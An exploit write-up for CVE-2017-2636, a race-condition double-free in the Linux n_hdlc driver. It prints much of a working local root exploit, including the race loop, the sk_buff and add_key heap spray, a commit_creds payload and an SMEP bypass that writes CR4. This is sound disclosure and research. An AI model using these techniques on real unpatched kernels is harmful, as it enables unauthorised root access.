Linux kernel local privilege escalation flaw in n_hdlc (CVE-2017-2636)


This article discloses the exploitation of [CVE-2017-2636](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2636), which is a race condition in the `n_hdlc` Linux kernel driver (`drivers/tty/n_hdlc.c`). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).

This driver provides the `HDLC` serial line discipline and comes as a kernel module in many Linux distributions, which have `CONFIG_N_HDLC=m` in the kernel config. So [RHEL 6/7](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2636), [Fedora](https://bugzilla.redhat.com/show_bug.cgi?id=1430049), [SUSE](https://bugzilla.novell.com/show_bug.cgi?id=CVE-2017-2636), [Debian](https://security-tracker.debian.org/tracker/CVE-2017-2636), and [Ubuntu](https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html) were affected by CVE-2017-2636.

Currently the flaw is [fixed](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) in the mainline Linux kernel ([public disclosure](http://seclists.org/oss-sec/2017/q1/569)). The bug was [introduced](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be10eb7589337e5defbe214dae038a53dd21add8) quite a long time ago, so the patch is backported to the stable kernel versions too.

I've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although that is possible with some additional effort. My PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel [attack](https://gruss.cc/files/prefetch.pdf) (see xairy's [implementation](https://github.com/xairy/kaslr-bypass-via-prefetch)).
First of all let's watch the [demo video](https://youtu.be/nDCvRxWxN0Y)!

## The n_hdlc bug

Initially, the `N_HDLC` line discipline used a self-made singly linked list for data buffers and had the `n_hdlc.tbuf` pointer for retransmitting a buffer after an error. It worked, but the commit `be10eb75893` added data flushing and introduced racy access to `n_hdlc.tbuf`. After a tx error, concurrent [`flush_tx_queue()`](http://lxr.free-electrons.com/ident?i=flush_tx_queue) and [`n_hdlc_send_frames()`](http://lxr.free-electrons.com/ident?i=n_hdlc_send_frames) both use `n_hdlc.tbuf` and can put one buffer to `tx_free_buf_list` twice. That causes an exploitable double-free error in [`n_hdlc_release()`](http://lxr.free-electrons.com/ident?i=n_hdlc_release). The data buffers are represented by `struct n_hdlc_buf` and allocated in the `kmalloc-8192` slab cache.

For fixing this bug, I [used](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) a standard kernel linked list and got rid of the racy `n_hdlc.tbuf`: in case of a tx error the current `n_hdlc_buf` item is put after the head of `tx_buf_list`.

I started the investigation when I got a suspicious kernel crash from [syzkaller](https://github.com/google/syzkaller). It is a really great project, which helped to fix an [impressively big list](https://github.com/google/syzkaller/wiki/Found-Bugs) of bugs in the Linux kernel.

## Exploitation

This article is the only way for me to publish the exploit code. So, please, be patient and prepare for plenty of listings!

### Winning the race

Let's look at the code of the main loop, which keeps racing until it succeeds:

```
	for (;;) {
		long tmo1 = 0;
		long tmo2 = 0;

		/* Alternate which of the two racing threads gets the lag */
		if (loop % 2 == 0)
			tmo1 = loop % MAX_RACE_LAG_USEC;
		else
			tmo2 = loop % MAX_RACE_LAG_USEC;
```

The `loop` counter is incremented every iteration, so the `tmo1` and `tmo2` variables change too. They are used for making lags in the racing threads, which:

1. synchronize at the `pthread_barrier`,
2. spin the specified number of microseconds in a busy loop,
3. interact with `n_hdlc`.

Colliding the threads this way helps to hit the race condition earlier.

```
		ptmd = open("/dev/ptmx", O_RDWR);
		if (ptmd < 0) {
			perror("[-] open /dev/ptmx");
			goto end;
		}

		ret = ioctl(ptmd, TIOCSETD, &ldisc);
		if (ret < 0) {
			perror("[-] TIOCSETD");
			goto end;
		}
```

Here we open a pseudoterminal master and slave pair and set the `N_HDLC` line discipline for it. For more information about that, see `man ptmx`, [`Documentation/serial/tty.txt`](http://lxr.free-electrons.com/source/Documentation/serial/tty.txt) and [this](https://unix.stackexchange.com/questions/117981/what-are-the-responsibilities-of-each-pseudo-terminal-pty-component-software) great discussion about `pty` components.

Setting the `N_HDLC` ldisc for a serial line causes autoloading of the `n_hdlc` kernel module. You can get the same effect using the `ldattach` daemon.

```
		ret = ioctl(ptmd, TCXONC, TCOOFF);
		if (ret < 0) {
			perror("[-] TCXONC TCOOFF");
			goto end;
		}

		bytes = write(ptmd, buf, TTY_BUF_SZ);
		if (bytes != TTY_BUF_SZ) {
			printf("[-] write to ptmx (bytes)\n");
			goto end;
		}
```

Here we suspend the pseudoterminal output (see `man tty_ioctl`) and write one data buffer. The `n_hdlc_send_frames()` fails to send this buffer and saves its address in `n_hdlc.tbuf`.

We are ready for the race. Start two threads, which are allowed to run on all available CPU cores:

* thread 1: flush the data with `ioctl(ptmd, TCFLSH, TCIOFLUSH)`;
* thread 2: start the suspended output with `ioctl(ptmd, TCXONC, TCOON)`.

In a lucky case, they both put the only written buffer, pointed to by `n_hdlc.tbuf`, to `tx_free_buf_list`.

Now we return to CPU 0 and trigger the possible double-free error:

```
		ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
		if (ret != 0) {
			perror("[-] sched_setaffinity");
			goto end;
		}

		ret = close(ptmd);
		if (ret != 0) {
			perror("[-] close /dev/ptmx");
			goto end;
		}
```

We close the pseudoterminal master.
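The three-step thread scheme described earlier (barrier, busy-loop lag, racing call) can be sketched roughly as follows. This is only an illustration under stated assumptions, not the exploit's actual thread code: `struct racer`, `spin_usec()`, `racer_fn()`, `run_race()` and `demo_action()` are hypothetical names, and the racing call is an arbitrary callback standing in for the real `ioctl()` wrappers.

```c
#define _GNU_SOURCE
#include <pthread.h>
#include <stdatomic.h>
#include <stddef.h>
#include <time.h>

/* Hypothetical helper: busy-wait for roughly `usec` microseconds
 * without sleeping, so the thread keeps running on its CPU. */
static void spin_usec(long usec)
{
	struct timespec start, now;
	long elapsed = 0;

	clock_gettime(CLOCK_MONOTONIC, &start);
	while (elapsed < usec) {
		clock_gettime(CLOCK_MONOTONIC, &now);
		elapsed = (now.tv_sec - start.tv_sec) * 1000000L +
			  (now.tv_nsec - start.tv_nsec) / 1000L;
	}
}

/* Hypothetical description of one side of the race. */
struct racer {
	pthread_barrier_t *barrier;	/* shared start line */
	long lag_usec;			/* plays the role of tmo1 or tmo2 */
	int (*action)(void *arg);	/* stand-in for the racing call */
	void *arg;
	int skip;			/* set if the race had to be aborted */
	int ret;			/* result of action() */
};

static void *racer_fn(void *p)
{
	struct racer *r = p;

	pthread_barrier_wait(r->barrier);	/* 1. synchronize */
	if (r->skip)
		return NULL;
	spin_usec(r->lag_usec);			/* 2. lag in a busy loop */
	r->ret = r->action(r->arg);		/* 3. make the racing call */
	return NULL;
}

/* Run both sides concurrently. Returns 0 on success, -1 on setup failure. */
static int run_race(struct racer *a, struct racer *b)
{
	pthread_barrier_t barrier;
	pthread_t ta, tb;

	if (pthread_barrier_init(&barrier, NULL, 2) != 0)
		return -1;
	a->barrier = b->barrier = &barrier;
	a->skip = b->skip = 0;

	if (pthread_create(&ta, NULL, racer_fn, a) != 0) {
		pthread_barrier_destroy(&barrier);
		return -1;
	}
	if (pthread_create(&tb, NULL, racer_fn, b) != 0) {
		a->skip = 1;			/* published by the barrier */
		pthread_barrier_wait(&barrier);	/* release the first thread */
		pthread_join(ta, NULL);
		pthread_barrier_destroy(&barrier);
		return -1;
	}

	pthread_join(ta, NULL);
	pthread_join(tb, NULL);
	pthread_barrier_destroy(&barrier);
	return 0;
}

/* Harmless stand-in action: atomically count how many sides ran. */
static int demo_action(void *arg)
{
	atomic_fetch_add((atomic_int *)arg, 1);
	return 0;
}
```

Giving the lag to only one side per iteration, as the main loop does with `tmo1` and `tmo2`, sweeps the relative timing of the two calls in both directions instead of relying on scheduler noise alone.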
The `n_hdlc_release()` goes through the `n_hdlc_buf_list` items and frees the kernel memory used for data buffers. Here the possible double-free error happens.

This particular bug is successfully detected by the Kernel Address Sanitizer ([KASAN](https://lwn.net/Articles/612153/)), which reports the use-after-free happening just before the second `kfree()`.

The final part of the main loop:

```
		ret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS);
		if (ret != EXIT_SUCCESS)
			goto end;

		if (getuid() == 0 && geteuid() == 0) {
			printf("[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\n",
			       loop, tmo1, tmo2);
			break; /* :) */
		}

		loop++;
	}

	printf("[+] finish as: uid=0, euid=0, start sh...\n");
	run_sh();
```

Here we try to exploit the double-free error by overwriting `struct sk_buff`. In case of success, we exit from the main loop and run the root shell in the child process using `execve()`.

### Exploiting the sk_buff

As I mentioned, the doubly freed `n_hdlc_buf` item is allocated in the `kmalloc-8192` slab cache. To exploit a double-free error in this cache, we need some kernel objects with a size a bit less than 8 kB. Actually, we need two types of such objects:

* one containing some function pointer,
* another one with a controllable payload, which can overwrite that pointer.

Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen `sk_buff` with its `destructor_arg` in `struct skb_shared_info`. This approach is not new: consider reading the cool write-up about [CVE-2016-2384](https://xairy.github.io/blog/2016/cve-2016-2384).

The network-related buffers in the Linux kernel are represented by `struct sk_buff`. See [these](http://vger.kernel.org/~davem/skb_data.html) great pictures describing the `sk_buff` data layout. The most important thing for us is that the network data and `skb_shared_info` are placed in the same kernel memory block pointed to by `sk_buff.head`.
So creating a 7500-byte network packet in the userspace will make `skb_shared_info` be allocated in the `kmalloc-8192` slab cache. Exactly like we want.

But there is one challenge: `n_hdlc_release()` frees 13 `n_hdlc_buf` items straight away. At first I was trying to do the heap spray in parallel with `n_hdlc_release()`, but didn't manage to inject the corresponding `kmalloc()` between the needed `kfree()` calls. So I used another way: spraying **after** `n_hdlc_release()` can give two `sk_buff` items with the `head` pointing to the same memory. That's promising.

So we need to spray hard but keep the 8 kB UDP packets allocated to avoid a mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using `socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)`:

* one client socket for sending UDP packets,
* one dedicated server socket, which is likely to receive two packets with the same `sk_buff.head`,
* 200 server sockets for receiving other packets emitted during heap spray,
* 200 server sockets for receiving the packets emitted during slab exhaustion.

Ok. Now we need another kernel object for overwriting the function pointer in `skb_shared_info.destructor_arg`. We can't use `sk_buff.head` for that again, because `skb_shared_info` is placed at the same offset in `sk_buff.head` and we don't control it. I was really happy to find that the `add_key` syscall is able to allocate controllable data in `kmalloc-8192` too.

But I became upset when I encountered the key data quotas in `/proc/sys/kernel/keys/`, which is owned by root. The default value of `/proc/sys/kernel/keys/maxbytes` is 20000. It means that only 2 `add_key` syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough.
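The quota limit is plain integer arithmetic, which the following minimal sketch works through. It assumes that each key is charged its payload size plus a small per-key overhead for the description, which simplifies the kernel's real accounting; `keys_within_quota()` and `read_maxbytes()` are hypothetical helper names, and `PAYLOAD_SZ` is the 8100-byte payload size used by the exploit.

```c
#include <stdio.h>

#define PAYLOAD_SZ 8100	/* payload size used by the exploit */

/* Hypothetical helper: how many keys of payload_sz bytes, each with
 * `overhead` extra bytes charged (assumed: the key description),
 * fit into a quota of maxbytes. */
static long keys_within_quota(long maxbytes, long payload_sz, long overhead)
{
	long per_key = payload_sz + overhead;

	if (maxbytes <= 0 || per_key <= 0)
		return 0;
	return maxbytes / per_key;
}

/* Read the per-user byte quota from procfs.
 * Returns -1 if the file is missing or unreadable. */
static long read_maxbytes(void)
{
	FILE *f = fopen("/proc/sys/kernel/keys/maxbytes", "r");
	long val = -1;

	if (!f)
		return -1;
	if (fscanf(f, "%ld", &val) != 1)
		val = -1;
	fclose(f);
	return val;
}
```

With the default quota of 20000 bytes, `keys_within_quota(20000, PAYLOAD_SZ, 0)` gives 2, and a few bytes of description overhead per key do not change that result.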
But the happiness returned when I encountered the bright idea in the [slides](https://speakerdeck.com/retme7/talk-is-cheap-show-me-the-code) of Di Shen from [Keen Security Lab](http://keenlab.tencent.com/en/): I can make the heap spray successful even if `add_key` fails!

So, let's look at the `init_payload()` code:

```
#define MMAP_ADDR	0x10000lu
#define PAYLOAD_SZ	8100
#define SKB_END_OFFSET	7872
#define KEY_DATA_OFFSET	18

int init_payload(char *p)
{
	struct skb_shared_info *info = (struct skb_shared_info *)(p +
					SKB_END_OFFSET - KEY_DATA_OFFSET);
	struct ubuf_info *uinfo_p = NULL;
```

The definitions of `struct skb_shared_info` and `struct ubuf_info` are copied to the exploit code from the [`include/linux/skbuff.h`](http://lxr.free-electrons.com/source/include/linux/skbuff.h) kernel header.

The payload buffer will be passed to `add_key` as a parameter, and the data which we put there at the `7872 - 18 = 7854` byte offset will exactly overwrite `skb_shared_info`.

```
	char *area = NULL;
	void *target_addr = (void *)(MMAP_ADDR);

	area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
		    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (area != target_addr) {
		perror("[-] mmap");
		return EXIT_FAILURE;
	}

	uinfo_p = target_addr;
	uinfo_p->callback = (uint64_t)root_it;

	info->destructor_arg = (uint64_t)uinfo_p;
	info->tx_flags = SKBTX_DEV_ZEROCOPY;
```

The `ubuf_info.callback` is called in [`skb_release_data()`](http://lxr.free-electrons.com/ident?i=skb_release_data) if `skb_shared_info.tx_flags` has the `SKBTX_DEV_ZEROCOPY` flag set to 1. In our case, the `ubuf_info` item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.

Anyway, now the `callback` points to `root_it()`, which does the classical `commit_creds(prepare_kernel_cred(0))`. However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.
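The offset arithmetic behind `SKB_END_OFFSET - KEY_DATA_OFFSET` can be checked with a small sketch. `struct key_payload_mirror` is a hypothetical userspace mirror of the header that the kernel is assumed to put in front of "user" key data on x86-64 kernels of that era (an RCU head of two pointers followed by a 16-bit length). The real layout differs between kernel versions, so treat the 18-byte figure as an assumption taken from the article's `KEY_DATA_OFFSET`. The helper names are hypothetical too.

```c
#include <stddef.h>

#define PAYLOAD_SZ	8100
#define SKB_END_OFFSET	7872
#define KEY_DATA_OFFSET	18

/* Hypothetical mirror of the assumed in-kernel key payload header. */
struct key_payload_mirror {
	void *rcu_next;			/* assumed: rcu_head.next */
	void (*rcu_func)(void *);	/* assumed: rcu_head.func */
	unsigned short datalen;		/* length of the user data */
	char data[];			/* user-controlled bytes start here */
};

/* Offset inside the userspace payload buffer whose bytes end up at
 * SKB_END_OFFSET within the reused kernel object. */
static size_t shinfo_offset_in_payload(void)
{
	return SKB_END_OFFSET - KEY_DATA_OFFSET;
}

/* True if an allocation of `size` bytes is served from kmalloc-8192,
 * i.e. it is larger than 4096 bytes and at most 8192 bytes. */
static int lands_in_kmalloc_8192(size_t size)
{
	return size > 4096 && size <= 8192;
}
```

Under these assumptions the key header plus the 8100-byte payload occupy 8118 bytes, which fits the `kmalloc-8192` size class, and offset 7854 lies inside the payload buffer.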
#### Heap spraying and stabilization

As I mentioned, `n_hdlc_release()` frees thirteen `n_hdlc_buf` items. Our `exploit_skb()` is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.

Now we are going to perform the use-after-free on `sk_buff.data`:

* receive 4 network packets on the dedicated server socket one by one,
* execute several `add_key` syscalls with our payload after receiving each of them.

The exact number of `add_key` syscalls giving the best results was found empirically by testing the exploit many times. An example of the `add_key` call:

```
	k[0] = syscall(__NR_add_key, "user", "payload0", payload,
		       PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING);
```

If we won the race and the heap spraying went our way, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:

```
	for (i = 0; i < KEYS_N; i++) {
		if (k[i] > 0)
			syscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]);
	}
```

Now we need to prepare the heap for the next round of `n_hdlc` racing. `/proc/slabinfo` shows that a `kmalloc-8192` slab stores only 4 objects, so the double-free error has a high chance of crashing the allocator. But the following trick helps to avoid that and makes the exploit much more stable: send a dozen UDP packets to fill the partially emptied slabs.

### SMEP bypass

As I mentioned, the `root_it()` shellcode resides in the userspace. Executing it in the kernelspace is detected by [SMEP](http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/) (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by setting bit 20 of the CR4 register.
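As a small illustration of the bit involved, the sketch below tests and clears bit 20 in a CR4 value held in an ordinary variable. It runs entirely in userspace and never touches the real register. The helper names are hypothetical, and `0x1406e0` in the usage note is an example value assumed for illustration.

```c
/* Bit 20 of CR4 controls SMEP. */
#define CR4_SMEP_BIT	20
#define CR4_SMEP_MASK	(1ul << CR4_SMEP_BIT)

/* True if the given CR4 value has SMEP enabled. */
static int cr4_smep_enabled(unsigned long cr4)
{
	return (cr4 & CR4_SMEP_MASK) != 0;
}

/* The same CR4 value with only the SMEP bit cleared. */
static unsigned long cr4_without_smep(unsigned long cr4)
{
	return cr4 & ~CR4_SMEP_MASK;
}
```

For the example value, `cr4_without_smep(0x1406e0ul)` yields `0x406e0`: every other feature bit is preserved and only SMEP is switched off.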
There are several approaches to defeat it. For example, Vitaly Nikolenko [describes](https://www.syscan360.org/slides/2016_SG_Vitaly_Nikolenko_Practical_SMEP_Bypass_Techniques.pdf) how to switch off SMEP using a stack-pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.

In [`arch/x86/include/asm/special_insns.h`](http://lxr.free-electrons.com/source/arch/x86/include/asm/special_insns.h) I've found this function:

```
static inline void native_write_cr4(unsigned long val)
{
	asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}
```

It writes its first argument to CR4.

Now let's look at `skb_release_data()`, which executes the hijacked `callback` in Ring 0:

```
	if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
		struct ubuf_info *uarg;

		uarg = shinfo->destructor_arg;
		if (uarg->callback)
			uarg->callback(uarg, true);
	}
```

We see that the destructor `callback` takes the `uarg` address as its first argument. And we control this address in the exploited `sk_buff`.

So I've decided to write the address of `native_write_cr4()` to `ubuf_info.callback` and put the `ubuf_info` item at the mmap'ed userspace address `0x406e0`, which is the correct value of CR4 with disabled SMEP. In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: the first time to disable SMEP, the second time to execute the shellcode. But that's not a problem for this particular exploit since it is fast and reliable.
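Because `0x406e0` serves both as a CR4 value and as a userspace address, the page that has to be mapped for it follows from simple masking. The sketch below assumes 4 KiB pages. The helper names are hypothetical, and the 24-byte object size in the usage note is an assumed size for `struct ubuf_info`, not a figure from the kernel sources.

```c
#include <stddef.h>

#define CR4_VAL	0x406e0ul
#define PAGE_SZ	0x1000ul	/* assumed 4 KiB pages */

/* Start of the page containing addr. */
static unsigned long page_base(unsigned long addr)
{
	return addr & ~(PAGE_SZ - 1);
}

/* Offset of addr inside its page. */
static unsigned long page_off(unsigned long addr)
{
	return addr & (PAGE_SZ - 1);
}

/* True if an object of obj_sz bytes placed at addr stays inside the
 * single page that starts at page_base(addr). */
static int fits_in_one_page(unsigned long addr, size_t obj_sz)
{
	return page_off(addr) + obj_sz <= PAGE_SZ;
}
```

Here `page_base(CR4_VAL)` is `0x40000` and `page_off(CR4_VAL)` is `0x6e0`, so a single 4 KiB mapping at `0x40000` covers a small object placed at `0x406e0`, as `fits_in_one_page(CR4_VAL, 24)` confirms.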
So let's initialize the payload a bit differently:

```
#define CR4_VAL	0x406e0lu

	void *target_addr = (void *)(CR4_VAL & 0xfffff000lu);

	area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
		    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (area != target_addr) {
		perror("[-] mmap");
		return EXIT_FAILURE;
	}

	uinfo_p = (struct ubuf_info *)CR4_VAL;
	uinfo_p->callback = NATIVE_WRITE_CR4;

	info->destructor_arg = (uint64_t)uinfo_p;
	info->tx_flags = SKBTX_DEV_ZEROCOPY;
```

That SMEP bypass looks witty, but introduces one additional requirement: it needs bit 18 (OSXSAVE) of CR4 set to 1. Otherwise `target_addr` becomes 0 and `mmap()` fails, since mapping the zero page is not allowed.

## Conclusion

Investigating `CVE-2017-2636` and writing this article was great fun for me. I want to thank [Positive Technologies](https://www.ptsecurity.com/ww-en/) for giving me the opportunity to work on this research.

I would really appreciate feedback. See my contacts below.